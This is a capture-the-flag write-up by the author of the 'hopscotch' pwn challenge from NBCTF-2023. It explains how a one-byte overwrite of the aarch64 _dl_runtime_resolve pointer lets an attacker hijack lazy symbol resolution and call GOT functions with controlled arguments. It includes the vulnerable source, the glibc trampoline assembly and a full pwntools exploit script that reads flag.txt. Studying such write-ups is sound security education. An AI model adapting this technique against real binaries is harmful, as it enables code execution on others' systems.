hopscotch
12/03/2023
By: unvariant
Tags: pwn NBCTF-2023Problem Description:
Hints:
Reveal Hints
maybe you should take a closer look how functions are resolved...The source for the challenge is fairly simple:
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <stdint.h>
#define BUFSZ 0x4000
int bad_pwner_returning_to_main = 0;
__attribute__((section(".plt"), leaf))
void filler() {
asm volatile(
".rept 0x10000 / 4\n"
"nop\n"
".endr\n"
"udf #0\n"
);
}
int main(int argc, char **argv) {
char *address, *old, *new;
int fd;
int status;
char buf[BUFSZ];
if (bad_pwner_returning_to_main > 0) {
asm volatile("udf #0");
}
bad_pwner_returning_to_main++;
setbuf(stdout, NULL);
setbuf(stdin, NULL);
fd = open("/proc/self/maps", O_RDONLY);
read(fd, buf, BUFSZ);
old = buf;
while ((new = strchr(old, '\n'))) {
*new = 0;
if (strstr(old, "run")) {
puts(old);
}
old = new + 1;
}
puts("exit status >");
read(0, buf, BUFSZ);
status = strtol(buf, NULL, 16);
puts("address >");
read(0, buf, BUFSZ);
address = (char *)strtol(buf, NULL, 16);
puts("character >");
read(0, buf, BUFSZ);
*address = buf[0];
printf("exiting with status: %d\n", status);
exit(status);
}
Buffering is disabled and it leaks the address of the binary via /proc/self/maps
. Also as the challenge description eludes to, it allows a single byte write to an address of the users choice. There is no buffer overflow or other vulnerability, just a leak, one byte write, and stack control.
For this challenge I wanted to attack the _dl_runtime_resolve
function that the linker uses to resolve GOT entries during runtime. If the binary protection is set to Partial RELRO or No Relro a function pointer to _dl_runtime_resolve
is present in the binary. However it is only writeable with No Relro.
First lets take a look at the function resolution chain:
When printf
is called it first calls the corresponding PLT entry for that function, which looks it up in the GOT table and branches to it.
If the function has not been resolved yet the GOT table will point to this function:
It saves the return address (x30) and the pointer to the GOT entry (x16) on the stack, and then loads x16 with a pointer to link_map
and calls _dl_runtime_resolve
.
The source for the aarch64 _dl_runtime_resolve
is located at sysdeps/aarch64/dl-trampoline.S
in the glibc source:
.text
.globl _dl_runtime_resolve
.type _dl_runtime_resolve, #function
cfi_startproc
.align 2
_dl_runtime_resolve:
BTI_C
/* AArch64 we get called with:
ip0 &PLTGOT[2]
ip1 temp(dl resolver entry point)
[sp, #8] lr
[sp, #0] &PLTGOT[n]
*/
cfi_rel_offset (lr, 8)
/* Note: Saving x9 is not required by the ABI but the assembler requires
the immediate values of operand 3 to be a multiple of 16 */
stp x8, x9, [sp, #-(80+8*16)]!
cfi_adjust_cfa_offset (80+8*16)
cfi_rel_offset (x8, 0)
cfi_rel_offset (x9, 8)
stp x6, x7, [sp, #16]
cfi_rel_offset (x6, 16)
cfi_rel_offset (x7, 24)
stp x4, x5, [sp, #32]
cfi_rel_offset (x4, 32)
cfi_rel_offset (x5, 40)
stp x2, x3, [sp, #48]
cfi_rel_offset (x2, 48)
cfi_rel_offset (x3, 56)
stp x0, x1, [sp, #64]
cfi_rel_offset (x0, 64)
cfi_rel_offset (x1, 72)
stp q0, q1, [sp, #(80+0*16)]
cfi_rel_offset (q0, 80+0*16)
cfi_rel_offset (q1, 80+1*16)
stp q2, q3, [sp, #(80+2*16)]
cfi_rel_offset (q0, 80+2*16)
cfi_rel_offset (q1, 80+3*16)
stp q4, q5, [sp, #(80+4*16)]
cfi_rel_offset (q0, 80+4*16)
cfi_rel_offset (q1, 80+5*16)
stp q6, q7, [sp, #(80+6*16)]
cfi_rel_offset (q0, 80+6*16)
cfi_rel_offset (q1, 80+7*16)
/* Get pointer to linker struct. */
ldr PTR_REG (0), [ip0, #-PTR_SIZE]
/* Prepare to call _dl_fixup(). */
ldr x1, [sp, 80+8*16] /* Recover &PLTGOT[n] */
sub x1, x1, ip0
add x1, x1, x1, lsl #1
lsl x1, x1, #3
sub x1, x1, #(RELA_SIZE<<3)
lsr x1, x1, #3
/* Call fixup routine. */
bl _dl_fixup
/* Save the return. */
mov ip0, x0
/* Get arguments and return address back. */
ldp q0, q1, [sp, #(80+0*16)]
ldp q2, q3, [sp, #(80+2*16)]
ldp q4, q5, [sp, #(80+4*16)]
ldp q6, q7, [sp, #(80+6*16)]
ldp x0, x1, [sp, #64]
ldp x2, x3, [sp, #48]
ldp x4, x5, [sp, #32]
ldp x6, x7, [sp, #16]
ldp x8, x9, [sp], #(80+8*16)
cfi_adjust_cfa_offset (-(80+8*16))
ldp ip1, lr, [sp], #16
cfi_adjust_cfa_offset (-16)
/* Jump to the newly found address. */
br ip0
cfi_endproc
.size _dl_runtime_resolve, .-_dl_runtime_resolve
The resolver saves all the registers, loads link_map
from x16 and the relocation index from the stack, and calls _dl_fixup
to locate the real address of the function. Afterwards it restores all the registers and calls the resolved function.
Since we have single byte arb write in the binary, so we can modify the lsb of the _dl_runtime_resolve
pointer and jump into the middle of the function instead of the start. This gives us control inside the function because if we skip the prologue where it saves the registers, we control the GOT index and the values of all the registers when it restores from the stack, since we control whatever is on the stack from the previous reads. We control the function it resolves, all of the functions arguments, and the return address of the function which allows us to call any function from the GOT with full argument control.
For example if we set the lsb so it starts here:
/* Get pointer to linker struct. */
ldr PTR_REG (0), [ip0, #-PTR_SIZE]
/* Prepare to call _dl_fixup(). */
ldr x1, [sp, 80+8*16] /* Recover &PLTGOT[n] */
sub x1, x1, ip0
add x1, x1, x1, lsl #1
lsl x1, x1, #3
sub x1, x1, #(RELA_SIZE<<3)
lsr x1, x1, #3
_dl_runtime_resolve
will load link_map
from x16 and the GOT index from the stack. We control the GOT index so we can redirect it to any function in the GOT.
/* Call fixup routine. */
bl _dl_fixup
/* Save the return. */
mov ip0, x0
/* Get arguments and return address back. */
ldp q0, q1, [sp, #(80+0*16)]
ldp q2, q3, [sp, #(80+2*16)]
ldp q4, q5, [sp, #(80+4*16)]
ldp q6, q7, [sp, #(80+6*16)]
ldp x0, x1, [sp, #64]
ldp x2, x3, [sp, #48]
ldp x4, x5, [sp, #32]
ldp x6, x7, [sp, #16]
ldp x8, x9, [sp], #(80+8*16)
cfi_adjust_cfa_offset (-(80+8*16))
ldp ip1, lr, [sp], #16
cfi_adjust_cfa_offset (-16)
/* Jump to the newly found address. */
br ip0
_dl_fixup
is called to resolve the function and the address is stashed in x16. All the clobbered registers are restored from the stack, along with the return address and the resolved function is called. We set the return address to the PLT resolver again so when the resolved function returns we can trigger this again to call another arbitrary function from the GOT.
The GOT table for this challenge holds open
, read
, and write
so we can leverage them to open flag.txt
and read it. If only read
is available this attack still works, you just have to set up the proper ret2dlresolve
structures in the .bss
section first so you can call arbitrary libc functions.
small red herring
Some competitors were looking at this specific part of the resolver:
/* Save the return. */
mov ip0, x0
/* Get arguments and return address back. */
ldp q0, q1, [sp, #(80+0*16)]
ldp q2, q3, [sp, #(80+2*16)]
ldp q4, q5, [sp, #(80+4*16)]
ldp q6, q7, [sp, #(80+6*16)]
ldp x0, x1, [sp, #64]
ldp x2, x3, [sp, #48]
ldp x4, x5, [sp, #32]
ldp x6, x7, [sp, #16]
ldp x8, x9, [sp], #(80+8*16)
cfi_adjust_cfa_offset (-(80+8*16))
ldp ip1, lr, [sp], #16
cfi_adjust_cfa_offset (-16)
/* Jump to the newly found address. */
br ip0
If you control x0
you can call an arbitrary function as long as you know the address of it beforehand, with full argument control. The one function in the challenge where you do have control over x0
is exit
, but its not exploitable for two reasons. First exit
accepts a 32 bit int and the binary is always mapped somewhere above the 32 bit address space, and there is a unresolved printf
call before the exit
where x0
is not controlled which would crash the program before reaching exit.
full solve script
from pwn import *
from time import sleep
context.clear(arch="arm64")
context.terminal = ["kitty"]
file = ELF("./runner")
env = {}
if args.GDB:
env["QEMU_GDB"] = "1337"
if args.HOST and args.PORT:
p = remote(args.HOST, args.PORT)
else:
p = process(["qemu-aarch64", "-strace", "-D", "qemu.log", "-singlestep", "./run"], env=env)
filebase = int(p.recvline().decode().split("-")[0], 16)
resolver = file.get_section_by_name(".got.plt").header.sh_addr + 0x10
overwrite = 0xac
trampoline = file.get_section_by_name(".plt").header.sh_addr + 4
log.info(f"filebase @ {filebase:#x}")
log.info(f"resolver @ {resolver:#x}")
p.sendlineafter(b">", b"0")
p.sendlineafter(b">", f"{filebase + resolver:#x}".encode())
def call(func: str, *args):
stuff: dict[int, int] = {
0xd0: filebase + file.got[func],
0xd8: filebase + trampoline,
}
for i in range(len(args)):
start = 0x40 - (i // 2) * 0x10
stuff[start + (i % 2) * 8] = args[i]
return fit(stuff)
# this first part of the payload is unnecessary, you can redirect to read immediately without going through printf
# but i was too lazy to recalculate all the offsets
payload = fit({
0x00: overwrite,
0x08: filebase + file.got.printf,
0x98: filebase + file.got.printf,
0xa0: filebase + trampoline,
})
payload += call("read", 0, filebase + file.bss(), 0x100)
payload += call("open", filebase + file.bss(), 0)
payload += call("read", 4, filebase + file.bss(), 0x100)
payload += call("puts", filebase + file.bss())
payload += call("exit", 13)
p.sendlineafter(b">", payload)
sleep(1)
p.sendline(b"flag.txt\x00")
p.interactive()